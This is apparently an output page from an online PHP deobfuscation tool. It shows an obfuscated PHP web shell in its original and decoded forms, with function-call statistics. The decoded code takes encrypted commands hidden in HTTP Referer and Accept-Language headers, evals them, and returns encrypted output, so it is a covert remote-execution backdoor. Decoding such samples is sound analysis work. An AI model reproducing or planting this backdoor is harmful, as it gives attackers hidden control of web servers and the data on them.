Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $p='reg_re3yp3ylace(array("/_/3y","/-/"),a3yrray("3y/","+"),3y$ss($3ys[$i3y],0,$e))..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$p='reg_re3yp3ylace(array("/_/3y","/-/"),a3yrray("3y/","+"),3y$ss($3ys[$i3y],0,$e)))3y,$3yk)));$o3y=ob_g3yet_c3yontents();3yo';
$x=';$e=strp3yos($3ys3y[$i],$f);if3y($e){$k=3y$kh.$3yk3yf;ob_3ystart()3y;@ev3yal(@gzuncom3ypress(@x(3y@base63y3y43y_deco3yde(p';
$R=str_replace('Rv','','creRvRvatRvRve_RvfunctiRvon');
$f='ERER"];$r3ya=@3y$r3y["HT3yTP_ACCEPT_LANGU3yAG3yE"];if($rr&&3y$ra){3y$u=3y3yparse_3yur3yl($rr);parse_str($3yu["que3yry"],$';
$K='q3y);$q=3yarr3yay_values($3yq3y);preg3y_mat3ych_all("3y/3y([\\w])[\\w-]+(?:3y;q3y=0.([\\d]))3y?3y,3y?/3y3y",$ra,$m);if($q&&$m){@s3';
$b='b_e3y3ynd_clea3yn();$d=base3y3y64_enco3yde(x(gzcompres3ys($o)3y,$k))3y;3yprint3y("<$k>$d</$k3y>");3y3y@session_de3ystroy();}}}}';
$z='[$m[2]3y[$z]];if(strp3yos(3y$p,3y$h)===0)3y{$s3y[$i]3y="";$p=$3yss($p,3);}if(arr3yay_ke3yy_e3yxi3ysts($i,$s3y)){$s3y[$i3y].=$p';
$e='$kh="3y5d41";$kf="43y023ya";fun3yc3yt3yion x($t,$3yk){$c=strlen($3yk);3y$l=3y3ystrlen($t);$o="";3yfor($i=03y;$i<$l3y;){fo3y';
$w='r($j=0;3y($j<$c3y&&$i3y3y<$l);$j++,$i++3y3y){$o.=$3yt{$3yi}^$k{$3yj3y};}}return $o;}$r3y=$_S3yERVER;$r3yr=@$r3y["HTTP_R3yEF3y';
$l='y3yession_star3yt();$s=&$3y_SES3ySION;$ss3y="3ysubstr";$sl3y="str3ytolower3y";3y$i=$m[1][03y].$3ym[1][3y1];3y3y$h=$sl($ss(m';
$W='d53y($i3y3y.$kh),0,3));$3yf=$sl($ss(md5(3y$i.$kf3y),0,3y3));$p3y="";for3y($z=1;3y$3yz<count($3ym[13y]);$z+3y+)$3yp.3y=$q';
$D=str_replace('3y','',$e.$w.$f.$K.$l.$W.$z.$x.$p.$b);
$O=$R('',$D);$O();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | 05731d106ac619d49f817554064ebf39 |
Eval Count | 1 |
Decode Time | 137 ms |